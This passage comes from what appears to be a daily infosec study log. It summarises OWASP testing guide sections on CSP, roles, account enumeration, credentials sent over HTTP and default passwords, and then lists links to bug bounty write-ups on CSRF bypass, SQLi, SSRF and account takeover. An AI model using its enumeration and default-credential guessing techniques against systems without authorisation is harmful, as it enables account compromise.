4. Framing can be enabled for all origins by the use of wildcard (*) source for frame-ancestors directive.
5. Business critical applications should require to use a strict policy.
**Remediation**
Configure a strong content security policy which reduces the attack surface of the application. Developers can verify the strength of content security policy using online tools such as Google CSP Evaluator.
**Strict Policy**
A strict policy is a policy which provides protection against classical stored, reflected, and some of the DOM XSS attacks and should be the optimal goal of any team trying to implement CSP.
Google went ahead and set up a guide to adopt a strict CSP based on nonces. Based on a presentation at LocoMocoSec, the following two policies can be used to apply a strict policy:
Moderate Strict Policy:
```
script-src 'nonce-r4nd0m' 'strict-dynamic';
object-src 'none'; base-uri 'none';
```
Locked down Strict Policy:
```
script-src 'nonce-r4nd0m';
object-src 'none'; base-uri 'none';
```
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 34 Task.md
================================================
🎯 Day 34 Task
🔃 THM Room - Linux PrivEsc
T 11 - Privilege Escalation: NFS
https://tryhackme.com/room/linprivesc
-------------------------------------------------------------------------------------------------------------------------
✅ eJPT
Networking (1-3)
1. Protocols - Study Guide
2. Internet Protocols (IP) - Study Guide
3. Routing - Study Guide
Ports Cheatsheet
http://packetlife.net/media/library/23/common-ports.pdf
**Note:- eJPT Material are very good for cracking the eJPT exam but I share some additional resource for learning !!!**
-------------------------------------------------------------------------------------------------------------------------
🔃 4.3 Identity Management Testing
✅ 4.3.1 Test Role Definitions
Test Objectives
1. Identify and document roles used by the application.
2. Attempt to switch, change, or access another role.
3. Review the granularity of the roles and the needs behind the permissions given.
How to Test - Roles Identification
The tester should start by identifying the application roles being tested through any of the following methods:
1. Application documentation.
2. Guidance by the developers or administrators of the application.
3. Application comments.
4. Fuzz possible roles:
a. cookie variable (e.g. role=admin, isAdmin=True)
b. account variable (e.g. Role: manager)
c. hidden directories or files (e.g. /admin, /mod, /backups)
d. switching to well known users (e.g. admin, backups, etc.)
Switching to Available Roles
After identifying possible attack vectors, the tester needs to test and validate that they can access the available roles.
Some applications define the roles of the user on creation, through rigorous checks and policies, or by ensuring that the user’s role is properly protected through a signature created by the backend. Finding that roles exist doesn’t mean that they’re a vulnerability.
Review Roles Permissions
After gaining access to the roles on the system, the tester must understand the permissions provided to each role.
A support engineer shouldn’t be able to conduct administrative functionalities, manage the backups, or conduct any transactions in the place of a user.
An administrator shouldn’t have full powers on the system. Sensitive admin functionality should leverage a maker-checker principle, or use MFA to ensure that the administrator is conducting the transaction. A clear example on this was the Twitter incident in 2020.
Tools
The above mentioned tests can be conducted without the use of any tool, except the one being used to access the system.
To make things easier and more documented, one can use:
Burp's Authorize extension
ZAP
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 35 Task.md
================================================
🎯 Day 35 Task
✅ eJPT
🔃 Networking (4)
Link Layer Devices & Protocols - Study Guide
-------------------------------------------------------------------------------------------------------------
✅ 4.3.2 Test User Registration Process
Test Objectives - Verify that the identity requirements for user registration are aligned with business and security requirements.
Validate the registration process.
How to Test - Verify that the identity requirements for user registration are aligned with business and security requirements:
1. Can anyone register for access?
3. Are registrations vetted by a human prior to provisioning, or are they automatically granted if the criteria are met?
5. Can the same person or identity register multiple times?
6. Can users register for different roles or permissions?
8. What proof of identity is required for a registration to be successful?
10. Are registered identities verified?
Validate the registration process:
1. Can identity information be easily forged or faked?
3. Can the exchange of identity information be manipulated during registration?
Example
In the WordPress example below, the only identification requirement is an email address that is accessible to the registrant.
In contrast, in the Google example below the identification requirements include name, date of birth, country, mobile phone number, email address and CAPTCHA response. While only two of these can be verified (email address and mobile number), the identification requirements are stricter than WordPress.
Remediation
Implement identification and verification requirements that correspond to the security requirements of the information the credentials protect.
Tools
BurpSuite/ZAP
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 36 Task.md
================================================
🎯 Day 36 Task
✅ 4.3.3 Test Account Provisioning Process
Test Objectives - Verify which accounts may provision other accounts and of what type.
How to Test
Determine which roles are able to provision users and what sort of accounts they can provision.
1. Is there any verification, vetting and authorization of provisioning requests?
3. Is there any verification, vetting and authorization of de-provisioning requests?
5. Can an administrator provision other administrators or just users?
7. Can an administrator or other user provision accounts with privileges greater than their own?
9. Can an administrator or user de-provision themselves?
11. How are the files or resources owned by the de-provisioned user managed? Are they deleted? Is access transferred?
Example
In WordPress, only a user’s name and email address are required to provision the user, as shown below:
De-provisioning of users requires the administrator to select the users to be de-provisioned, select Delete from the dropdown menu (circled) and then applying this action. The administrator is then presented with a dialog box asking what to do with the user’s posts (delete or transfer them).
Tools
While the most thorough and accurate approach to completing this test is to conduct it manually, HTTP proxy tools could be also useful.
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 37 Task.md
================================================
🎯 Day 37 Task
✅ 4.3.4 Testing for Account Enumeration and Guessable User Account
Test Objectives
1. Review processes that pertain to user identification (e.g. registration, login, etc.).
2. Enumerate users where possible through response analysis.
How to Test
In black-box testing, the tester knows nothing about the specific application, username, application logic, error messages on log in page, or password recovery facilities. If the application is vulnerable, the tester receives a response message that reveals, directly or indirectly, some information useful for enumerating users.
HTTP Response Message
Testing for Valid Credentials
Record the server answer when you submit a valid user ID and valid password.
_Using a web proxy, notice the information retrieved from this successful authentication (HTTP 200 Response, length of the response)._
Testing for Valid User with Wrong Password
Now, the tester should try to insert a valid user ID and a wrong password and record the error message generated by the application.
The browser should display a message similar to the following one:
Testing for Valid User with Wrong Password
Now, the tester should try to insert a valid user ID and a wrong password and record the error message generated by the application.
The browser should display a message similar to the following one: Authentication Failed
Testing for a Nonexistent Username
Now, the tester should try to insert an invalid user ID and a wrong password and record the server answer (the tester should be confident that the username is not valid in the application). Record the error message and the server answer.
If the tester enters a nonexistent user ID, they can receive a message similar to: This User is Not Active or a message like the following one
Generally the application should respond with the same error message and length to the different incorrect requests. If the responses are not the same, the tester should investigate and find out the key that creates a difference between the two responses. For example:
1. Client request: Valid user/wrong password
2. Server response: The password is not correct
3. Client request: Wrong user/wrong password
4. Server response: User not recognized
The above responses let the client understand that for the first request they have a valid username. So they can interact with the application requesting a set of possible user IDs and observing the answer.
Looking at the second server response, the tester understand in the same way that they don’t hold a valid username. So they can interact in the same manner and create a list of valid user ID looking at the server answers.
Other Ways to Enumerate Users - Testers can enumerate users in several ways, such as:
Analyzing the Error Code Received on Login Pages
Some web application release a specific error code or message that we can analyze.
Analyzing URLs and URLs Re-directions
For example:
http://www.foo.com/err.jsp?User=baduser&Error=0
http://www.foo.com/err.jsp?User=gooduser&Error=2
As is seen above, when a tester provides a user ID and password to the web application, they see a message indication that an error has occurred in the URL. In the first case they have provided a bad user ID and bad password. In the second, a good user ID and a bad password, so they can identify a valid user ID.
URI Probing
Sometimes a web server responds differently if it receives a request for an existing directory or not. For instance in some portals every user is associated with a directory. If testers try to access an existing directory they could receive a web server error.
Some of the common errors received from web servers are:
403 Forbidden error code
404 Not found error code
Example:
http://www.foo.com/account1 - we receive from web server: 403 Forbidden
http://www.foo.com/account2 - we receive from web server: 404 file Not Found
In the first case the user exists, but the tester cannot view the web page, in second case instead the user “account2” does not exist. By collecting this information testers can enumerate the users.
Analyzing Web Page Titles
Testers can receive useful information on Title of web page, where they can obtain a specific error code or messages that reveal if the problems are with the username or password.
For instance, if a user cannot authenticate to an application and receives a web page whose title is similar to:
1. Invalid user
2. Invalid authentication
Analyzing a Message Received from a Recovery Facility
When we use a recovery facility (i.e. a forgotten password function) a vulnerable application might return a message that reveals if a username exists or not.
For example, messages similar to the following:
1. Invalid username: email address is not valid or the specified user was not found.
2. Valid username: Your password has been successfully sent to the email address you registered with.
Friendly 404 Error Message
When we request a user within the directory that does not exist, we don’t always receive 404 error code. Instead, we may receive “200 ok” with an image, in this case we can assume that when we receive the specific image the user does not exist. This logic can be applied to other web server response; the trick is a good analysis of web server and web application messages.
Analyzing Response Times
As well as looking at the content of the responses, the time that the response take should also be considered. Particularly where the request causes an interaction with an external service (such as sending a forgotten password email), this can add several hundred milliseconds to the response, which can be used to determine whether the requested user is valid.
Guessing Users
```
CN000100
CN000101
...
```
Sometimes the usernames are created with a REALM alias and then a sequential numbers:
R1001 – user 001 for REALM1
R2001 – user 001 for REALM2
By enumerating user accounts, you risk locking out accounts after a predefined number of failed probes (based on application policy). Also, sometimes, your IP address can be banned by dynamic rules on the application firewall or Intrusion Prevention System.
Tools
BurpSuite/ZAP
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 38 Task.md
================================================
🎯 Day 38 Task
✅ THM Room
https://tryhackme.com/room/sudovulnsbypass
✅ 4.3.5 Testing for Weak or Unenforced Username Policy
Test Objectives
Determine whether a consistent account name structure renders the application vulnerable to account enumeration.
Determine whether the application’s error messages permit account enumeration.
How to Test
1. Determine the structure of account names.
2. Evaluate the application’s response to valid and invalid account names.
3. Use different responses to valid and invalid account names to enumerate valid account names.
4. Use account name dictionaries to enumerate valid account names.
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 39 Task.md
================================================
🎯 Day 39 Task
✅ 4.4.1 Testing for Credentials Transported over an Encrypted Channel
Test Objectives
1. Identify sensitive information transmitted through the various channels.
2. Assess the privacy and security of the channels used.
Example 1: Basic Authentication over HTTP
A typical example is the usage of Basic Authentication over HTTP. When using Basic Authentication, user credentials are encoded rather than encrypted, and are sent as HTTP headers. In the example below the tester uses curl to test for this issue. Note how the application uses Basic authentication, and HTTP rather than HTTPS.
```
curl -kis http://example.com/restricted/
HTTP/1.1 401 Authorization Required
Date: Fri, 01 Aug 2013 00:00:00 GMT
WWW-Authenticate: Basic realm="Restricted Area"
Accept-Ranges: bytes Vary:
Accept-Encoding Content-Length: 162
Content-Type: text/html
<html><head><title>401 Authorization Required</title></head>
<body bgcolor=white> <h1>401 Authorization Required</h1> Invalid login credentials! </body></html>
```
Example 2: Form-Based Authentication Performed over HTTP
Another typical example is authentication forms which transmit user authentication credentials over HTTP. In the example below one can see HTTP being used in the action attribute of the form. It is also possible to see this issue by examining the HTTP traffic with an interception proxy.
```
<form action="http://example.com/login">
<label for="username">User:</label> <input type="text" id="username" name="username" value=""/><br />
<label for="password">Password:</label> <input type="password" id="password" name="password" value=""/>
<input type="submit" value="Login"/>
</form>
```
Example 3: Cookie Containing Session ID Sent over HTTP
The Session ID Cookie must be transmitted over protected channels. If the cookie does not have the secure flag set, it is permitted for the application to transmit it unencrypted. Note below the setting of the cookie is done without the Secure flag, and the entire log in process is performed in HTTP and not HTTPS.
```
https://secure.example.com/login
POST /login HTTP/1.1
Host: secure.example.com
[...]
Referer: https://secure.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 188
HTTP/1.1 302 Found
Date: Tue, 03 Dec 2013 21:18:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD99F321233AF69593EDF52B123B5BDA; expires=Fri, 01-Jan-2014 00:00:00 GMT; path=/; domain=example.com; httponly
Location: private/
Content-Length: 0
Content-Type: text/html
```
```
http://example.com/private
GET /private HTTP/1.1
Host: example.com
[...]
Referer: https://secure.example.com/login
Cookie: JSESSIONID=BD99F321233AF69593EDF52B123B5BDA;
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Content-Length: 730
Date: Tue, 25 Dec 2013 00:00:00 GMT
```
Example 4: Password Reset, Change Password or Other Account Manipulation over HTTP
If the web application has features that allow a user to change an account or call a different service with credentials, verify all of those interactions use HTTPS. The interactions to test include the following:
1. Forms that allow users to handle a forgotten password or other credentials
2. Forms that allow users to edit credentials
3. Forms that require the user to authenticate with another provider (for example, payment processing)
Example 5: Testing Password Sensitive Information in Source Code or Logs
Use one of the following techniques to search for senstive information.
Checking if password or encyrption key is hardcoded in the source code or configuration files.
```
grep -r –E "Pass | password | pwd |user | guest| admin | encry | key | decrypt | sharekey " ./PathToSearch/
```
Checking if logs or source code may contain phone number, email address, ID or any other PII. Change the regular expression based on the format of the PII.
```
grep -r " {2\}[0-9]\{6\} " ./PathToSearch/
```
Remediation - Use HTTPS for the whole web site and redirect any HTTP requests to HTTPS.
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 40 Task.md
================================================
🎯 Day 40 Task
✅ 4.4.2 Testing for Default Credentials
Test Objectives
1. Determine whether the application has any user accounts with default passwords.
2. Review whether new user accounts are created with weak or predictable passwords.
How to Test - Testing for Vendor Default Credentials
The first step to identifying default passwords is to identify the software that is in use.
Once the software has been identified, try to find whether it uses default passwords, and if so, what they are. This should include:
1. Searching for “[SOFTWARE] default password”.
2. Reviewing the manual or vendor documentation.
3. Checking common default password databases, such as CIRT.net, SecLists Default Passwords or DefaultCreds-cheat-sheet.
4. Inspecting the application source code (if available).
5. Installing the application on a virtual machine and inspecting it.
6. Inspecting the physical hardware for stickers (often present on network devices).
If a default password can’t be found, try common options such as:
1. “admin”, “password”, “12345”, or other common default passwords.
2. An empty or blank password.
3. The serial number or MAC address of the device.
If the username is unknown, there are various options for enumerating users, discussed in the Testing for Account Enumeration guide. Alternatively, try common options such as “admin”, “root”, or “system”.
Testing for Organisation Default Passwords
When staff within an organisation manually create passwords for new accounts, they may do so in a predictable way. This can often be:
1. A single common password such as “Password1”.
2. Organisation specific details, such as the organisation name or address.
3. Passwords that follow a simple pattern, such as “Monday123” if account is created on a Monday.
Testing for Application Generated Default Passwords
If the application automatically generates passwords for new user accounts, these may also be predictable. In order to test these, create multiple accounts on the application with similar details at the same time, and compare the passwords that are given for them.
The passwords may be based on:
1. A single static string shared between accounts.
2. A hashed or obfuscated part of the account details, such as md5($username).
3. A time-based algorithm.
4. A weak pseudo-random number generator (PRNG).
Tools - BurpSuite Intruder, Hydra
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 41 Task.md
================================================
🎯 Day 41 Task
CSRF
https://medium.com/@chiragrai3666/csrf-today-techniques-mitigations-and-bypasses-continued-4587992b6087
#infosec #learn365
================================================
FILE: Resources/Day 42 Task.md
================================================
🎯 Day 42 Task
✅ Open Redirect
https://youtu.be/dz052doAJSE
#infosec #learn365
================================================
FILE: Resources/Day 43 Task.md
================================================
🎯 Day 43 Task
✅ Log4j
https://youtu.be/lKPUCkPTcJA
https://youtu.be/Z70B3fYQUNs
#infosec #learn365
================================================
FILE: Resources/Day 44 Task.md
================================================
🎯 Day 44 Task
JWT Attacking JSON Web Tokens
✅ https://infosecwriteups.com/attacking-json-web-tokens-jwts-d1d51a1e17cb
#infosec #learn365
================================================
FILE: Resources/Day 45 Task.md
================================================
🎯 Day 45 Task
✅ Content Discovery
https://youtu.be/fGlzDi3hwlU
#infosec #learn365
================================================
FILE: Resources/Day 46 Task.md
================================================
🎯 Day 46 Task
✅ Idor
https://medium.com/@aysebilgegunduz/everything-you-need-to-know-about-idor-insecure-direct-object-references-375f83e03a87
#infosec #learn365
================================================
FILE: Resources/Day 47 Task.md
================================================
🎯 Day 47 Task
✅ Account Takeover
https://medium.com/techiepedia/p5-to-p1-intresting-account-takeover-6e59b879494b
#infosec #learn365
================================================
FILE: Resources/Day 48 Task.md
================================================
🎯 Day 48 Task
✅ RCE on a Java Web Application
https://infosecwriteups.com/the-story-of-a-rce-on-a-java-web-application-2e400cddcd1e
#infosec #learn365
================================================
FILE: Resources/Day 49 Task.md
================================================
🎯 Day 49 Task
✅ Dependency Confusion
https://hetroublemakr.medium.com/how-i-approached-dependency-confusion-272b46f66907
#infosec #learn365
================================================
FILE: Resources/Day 50 Task.md
================================================
🎯 Day 50 Task
✅ Automate Blind XSS
https://securityonline.info/blind-xss-search/
https://youtu.be/GcznQUsNW3s
#infosec #learn365
================================================
FILE: Resources/Day 51 Task.md
================================================
🎯 Day 51 Task
✅ Finding And Exploiting S3 Amazon Buckets For Bug Bounties
https://infosecwriteups.com/finding-and-exploiting-s3-amazon-buckets-for-bug-bounties-6b782872a6c4
#infosec #learn365
================================================
FILE: Resources/Day 52 Task.md
================================================
🎯 Day 52 Task
✅ Web Cache Poisioning attack
https://gupta-bless.medium.com/exploiting-web-cache-poisoning-e3a6b9df157e
#infosec #learn365
================================================
FILE: Resources/Day 53 Task.md
================================================
🎯 Day 53 Task
✅ Unique Case for Price Manipulation
https://infosecwriteups.com/unique-case-for-price-manipulation-bugbounty-vapt-df57637769cd
#infosec #learn365
================================================
FILE: Resources/Day 54 Task.md
================================================
🎯 Day 54 Task
✅ Account takeover via the Password Reset Functionality.
https://infosecwriteups.com/how-i-was-able-to-take-over-any-account-via-the-password-reset-functionality-ef1659f8b481
#infosec #learn365
================================================
FILE: Resources/Day 55 Task.md
================================================
🎯 Day 55 Task
✅ THM Room
https://tryhackme.com/room/ohsint
✅ API Token Hijacking Through Clickjacking
https://infosecwriteups.com/api-token-hijacking-through-clickjacking-2e36c02e6c48
#infosec #learn365
================================================
FILE: Resources/Day 56 Task.md
================================================
🎯 Day 56 Task
✅ API Exploitation →Business Logic Bug
https://medium.com/techiepedia/api-exploitation-business-logic-bug-c176d9df47ee
#infosec #learn365
================================================
FILE: Resources/Day 57 Task.md
================================================
🎯 Day 57 Task
✅ Attended [Infosec Conference](https://twitter.com/InfoSecComm) on : Android Static Analysis
https://docs.google.com/presentation/d/1GxcKVrkrnNno1Ro5knmksp1-oVzein6y2xMJxJ9Kz3g/edit?usp=drivesdk
#infosec #learn365
================================================
FILE: Resources/Day 58 Task.md
================================================
🎯 Day 58 Task
✅ Finding bugs on NFT website for fun & Profit by @zseano
#infosec #learn365
================================================
FILE: Resources/Day 59 Task.md
================================================
🎯 Day 59 Task
✅ EXIF Geolocation Data Not Stripped From Uploaded Images
https://medium.com/@souravnewatia/exif-geolocation-data-not-stripped-from-uploaded-images-794d20d2fa7d#:~:text=Summary%3A,Software%20%26%20Software%20version%20used%20etc.
#infosec #learn365
================================================
FILE: Resources/Day 60 Task.md
================================================
🎯 Day 60 Task
✅ Thick Client Pentesting
https://payatu.com/blog/farid/Thick-Client-Basic
https://youtu.be/dC9M4haCd5Y
#infosec #learn365
================================================
FILE: Resources/Day 61 Task.md
================================================
🎯 Day 61 Task
✅ Conduct a Penetration Test Like a Pro in 6 Phases
https://youtu.be/8a1yTN2kFNw
#infosec #learn365
================================================
FILE: Resources/Day 62 Task.md
================================================
🎯 Day 62 Task
✅ Firewall Penetration Testing
https://youtu.be/0Izu0J6iSoM
https://youtu.be/ocekT9Llep0
#infosec #learn365
================================================
FILE: Resources/Day 63 Task.md
================================================
🎯 Day 63 Task
✅ Host Discovery & Vulnerability Scanning With Nessus
https://youtu.be/TA1rCRyHRsM
#infosec #learn365
================================================
FILE: Resources/Day 64 Task.md
================================================
🎯 Day 64 Task
✅ AWS Web Application Firewall (WAF)
https://youtu.be/udug43AWeJw
✅ 5 Exercise Pentesterlabs
#infosec #learn365
================================================
FILE: Resources/Day 65 Task.md
================================================
🎯 Day 65 Task
✅ Introduction To Pentesting - Enumeration
https://youtu.be/WvSEkPU1n0I
✅ 6 Exercise Pentesterlabs
#infosec #learn365
================================================
FILE: Resources/Day 66 Task.md
================================================
🎯 Day 66 Task
✅ Bypassing CSRF Protection
https://medium.com/swlh/bypassing-csrf-protection-c9b217175ee
https://medium.com/@Skylinearafat/a-very-useful-technique-to-bypass-the-csrf-protection-for-fun-and-profit-471af64da276
✅ 5 Pentesterlab Exercises
#infosec #learn365
================================================
FILE: Resources/Day 67 Task.md
================================================
🎯 Day 67 Task
✅ HTML Injection
https://medium.com/@chaitanyarajhans024/simple-html-injection-to-250-895b760409ed
https://vedanttekale20.medium.com/how-html-injection-in-email-got-me-my-first-bounty-761592eab6bb
#infosec #learn365
================================================
FILE: Resources/Day 68 Task.md
================================================
🎯 Day 68 Task
✅ Exploiting SQL Injection
https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716
✅ Completed Unix Badge
#infosec #learn365
================================================
FILE: Resources/Day 69 Task.md
================================================
🎯 Day 69 Task
✅ A Weird Price Tampering Vulnerability
https://medium.com/@vflexo/a-weird-price-tampering-vulnerability-1251dfe8d2a1
✅ Security Operations Center (SOC)
https://youtu.be/34U_q3UCnYY
#infosec #learn365
================================================
FILE: Resources/Day 70 Task.md
================================================
🎯 Day 70 Task
✅ A Summary of OAuth 2.0 Attack Methods
https://medium.com/@TutorialBoy24/a-summary-of-oauth-2-0-attack-methods-36834805c631
https://youtu.be/0T8WG2liEC0
#infosec #learn365
================================================
FILE: Resources/Day 71 Task.md
================================================
🎯 Day 71 Task
✅ Bypassing CSRF Protection
https://medium.com/swlh/bypassing-csrf-protection-c9b217175ee
✅ 6 Methods to bypass CSRF protection on a web application
https://shahmeeramir.com/methods-to-bypass-csrf-protection-on-a-web-application-3198093f6599
#infosec #learn365
================================================
FILE: Resources/Day 72 Task.md
================================================
🎯 Day 72 Task
✅ Two-factor authentication security testing and possible bypasses
https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35
#infosec #learn365
================================================
FILE: Resources/Day 73 Task.md
================================================
🎯 Day 73 Task
✅ 10 Types of Web Vulnerabilities that are Often Missed
https://labs.detectify.com/2021/09/30/10-types-web-vulnerabilities-often-missed/
✅ Understanding BOLA(Broken Object-level Authorisation) vulnerability
https://youtu.be/vnDLFxx6bKs
#infosec #learn365
================================================
FILE: Resources/Day 74 Task.md
================================================
🎯 Day 74 Task
✅ My First Bug Bounty: SQL Injection
https://infosecwriteups.com/first-bug-bounty-ever-sql-injection-da4e64e30851
✅ SQL INJECTION VULNERABILITY
https://youtu.be/NQ_WIyu9fUQ
#infosec #learn365
================================================
FILE: Resources/Day 75 Task.md
================================================
🎯 Day 75 Task
✅ Dank Writeup On Broken Access Control
https://infosecwriteups.com/dank-writeup-on-broken-access-control-on-an-indian-startup-d29132a1ecd
✅ Bug bounty tips for broken access control on BurpSuite Part 1
https://youtu.be/TJQpOrtet8E
#infosec #learn365
================================================
FILE: Resources/Day 76 Task.md
================================================
🎯 Day 76 Task
✅ SSRF in PDF Renderer using SVG
https://pwn.vg/articles/2021-05/ssrf-in-pdf-renderer-using-svg
✅ Bypassing 2FA using OpenID Misconfiguration
https://youst.in/posts/bypassing-2fa-using-openid-misconfiguration
#infosec #learn365
================================================
FILE: Resources/Day 77 Task.md
================================================
🎯 Day 77 Task
✅ Easy IDOR hunting with Autorize?
https://youtu.be/2WzqH6N-Gbc
✅ HOW I hacked thousand of subdomains
https://medium.com/@moSec/how-i-hacked-thousand-of-subdomains-6aa43b92282c
#infosec #learn365
================================================
FILE: Resources/Day 78 Task.md
================================================
🎯 Day 78 Task
✅ A business logic error bug worth 600$
https://itsdeepceh.medium.com/a-business-logic-error-bug-worth-600-a0050720bfee
✅ 5 Methods to bypass Authentication (OTP)
https://youtu.be/LYDTnkCurU0
#infosec #learn365
================================================
FILE: Resources/Day 79 Task.md
================================================
🎯 Day 79 Task
✅ How to find IDOR | Privilege escalation | weak authorization | Broken access control | Burp Autorize
https://youtu.be/xEttsFQ_0pQ
✅ How did I earn €€€€ by breaking the back-end logic of the server
https://dewcode.medium.com/how-did-i-earn-by-breaking-the-back-end-logic-of-the-server-fd94882cbdf6
#infosec #learn365
================================================
FILE: Resources/Day 80 Task.md
================================================
🎯 Day 80 Task
✅ Account Takeover via Web Cache Poisoning based Reflected XSS
https://lutfumertceylan.com.tr/posts/acc-takeover-web-cache-xss/
✅ A Pentester's Guide to Server Side Template Injection (SSTI)
https://cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti
#infosec #learn365
================================================
FILE: Resources/Day 81 Task.md
================================================
🎯 Day 81 Task
✅ Account Takeover: From zero to System Admin using basic skills
https://youtu.be/t6-SXKIun8s
✅ Apache Example Servlet leads to $$$$
https://infosecwriteups.com/apache-example-servlet-leads-to-61a2720cac20
#infosec #learn365
================================================
FILE: Resources/Day 82 Task.md
================================================
🎯 Day 82 Task
✅ The easiest $2500 I got it from bug bounty program
https://3bodymo.medium.com/the-easiest-2500-i-got-it-from-bug-bounty-program-8f47ea4aff22
✅ A Pentester’s Guide to File Inclusion
https://cobalt.io/blog/a-pentesters-guide-to-file-inclusion
#infosec #learn365
================================================
FILE: Resources/Day 83 Task.md
================================================
🎯 Day 83 Task
✅ How I bypassed disable_functions in php to get a remote shell
https://infosecwriteups.com/how-i-bypassed-disable-functions-in-php-to-get-a-remote-shell-48b827d54979
✅ JWTs - Patterns & Anti-patterns
https://youtu.be/xTk4ff0eAUg
#infosec #learn365
================================================
FILE: Resources/Day 84 Task.md
================================================
🎯 Day 84 Task
✅ Finding Your Next Bug: GraphQL
https://youtu.be/jyjGneKJynk
✅ No Rate Limit - 2K$ Bounty
https://shahjerry33.medium.com/no-rate-limit-2k-bounty-642720ffba99
#infosec #learn365
================================================
FILE: Resources/Day 85 Task.md
================================================
🎯 Day 85 Task
✅ Facebook email disclosure and account takeover
https://medium.com/pentesternepal/facebook-email-disclosure-and-account-takeover-ecdb44ee12e9
✅ How to learn anything in Computer Science or Cybersecurity | Security Simplified
https://youtu.be/C8qH9fBR3d0
#infosec #learn365
================================================
FILE: Resources/Day 86 Task.md
================================================
🎯 Day 86 Task
✅ Hacking banks with race conditions
https://youtu.be/QtV3Qc-bY1s
✅ Exploiting a Race Condition Vulnerability
https://medium.com/@vincenz/exploiting-a-race-condition-vulnerability-3f2cb387a72
#infosec #learn365
================================================
FILE: Resources/Day 87 Task.md
================================================
🎯 Day 87 Task
✅ A Comprehensive Guide to Broken Access Control
https://medium.com/purplebox/broken-access-control-f82235ddf888
✅ Never leave this tip while you hunting Broken Access Control
https://secureitmania.medium.com/never-leave-this-tip-while-you-hunting-broken-access-control-f63c00b1e96a
✅ POC
https://youtu.be/mmxni6f0sgs
https://youtu.be/ysuMf_F328U
#infosec #learn365
================================================
FILE: Resources/Day 88 Task.md
================================================
🎯 Day 88 Task
✅ A Journey from IDOR to Account Takeover
https://payatu.com/blog/arjuns/A-Journey-IDOR-to-Account-Takeover
✅ Exploiting open redirect - Whitelist bypass using Salesforce environment
https://payatu.com/blog/gaurav/exploiting-open-redirect
#infosec #learn365
================================================
FILE: Resources/Day 89 Task.md
================================================
🎯 Day 89 Task
✅ Union Based SQL Injection — Bug Hunting
https://eslam3kl.medium.com/sql-injection-at-spotify-d19e0861ddf0
✅ Bypass confirmation to add payment method
https://0xpopoy.medium.com/bypass-confirmation-to-add-payment-method-df2772a36561
#infosec #learn365
================================================
FILE: Resources/Day 90 Task.md
================================================
🎯 Day 90 Task
✅ Exploiting cross-site scripting in Referer header
https://www.gremwell.com/exploiting_xss_in_referer_header
✅ XSS via X-Forwarded-Host header
https://medium.com/@abhijeetbiswas_/xss-cross-site-scripting-via-x-forwarded-host-header-20be114d4254
#infosec #learn365
================================================
FILE: Resources/Day 91 Task.md
================================================
🎯 Day 91 Task
✅ How I bypassed 403 forbidden domain using a simple trick
https://janmuhammadzaidi.medium.com/how-i-bypassed-403-forbidden-domain-using-a-simple-trick-c2d538de04b8
✅ Deleting account via support ticket
https://pwnsec.ninja/2022/03/26/deleting-account-via-support-ticket/
#infosec #learn365
================================================
FILE: Resources/Day 92 Task.md
================================================
🎯 Day 92 Task
✅ Bypassing SSRF Protection to Exfiltrate AWS Metadata from LarkSuite
https://sirleeroyjenkins.medium.com/bypassing-ssrf-protection-to-exfiltrate-aws-metadata-from-larksuite-bf99a3599462
✅ WordPress < 5.8.3 - Object Injection Vulnerability
https://blog.sonarsource.com/wordpress-object-injection-vulnerability
#infosec #learn365
================================================
FILE: Resources/Day 93 Task.md
================================================
🎯 Day 93 Task
✅ 0-day Cross Origin Request Forgery vulnerability in Grafana 8.x
https://hackerone.com/reports/1458236
#infosec #learn365
================================================
FILE: Resources/Day 94 Task.md
================================================
🎯 Day 94 Task
✅ GOT ACCESS TO DOTA 2 ADMIN PANEL BY EXPLOITING IN-GAME FEATURE
https://abdilahrf.github.io/bugbounty/got-access-to-dota-2-admin-panel-by-exploiting-in-game-feature
#infosec #learn365
================================================
FILE: Resources/Day 95 Task.md
================================================
🎯 Day 95 Task
✅ How I escalated RFI into LFI
http://hassankhanyusufzai.com/RFI_LFI_writeup/
#infosec #learn365
================================================
FILE: Resources/Day 96 Task.md
================================================
🎯 Day 96 Task
✅ Stumbling upon a new way to exploit authorization bypass in Jira
https://blog.detectify.com/2019/01/29/hacking-isnt-an-exact-science/
#infosec #learn365
================================================
FILE: Resources/Day 97 Task.md
================================================
🎯 Day 97 Task
✅ Clickjacking on Google MyAccount Worth 7,500$
https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/
#infosec #learn365
================================================
FILE: Resources/Day 98 Task.md
================================================
🎯 Day 98 Task
✅ Info Disclosure and SQLi Writeup
https://aaronesau.com/blog/posts/5
#infosec #learn365
================================================
FILE: Resources/Day 99 Task.md
================================================
🎯 Day 99 Task
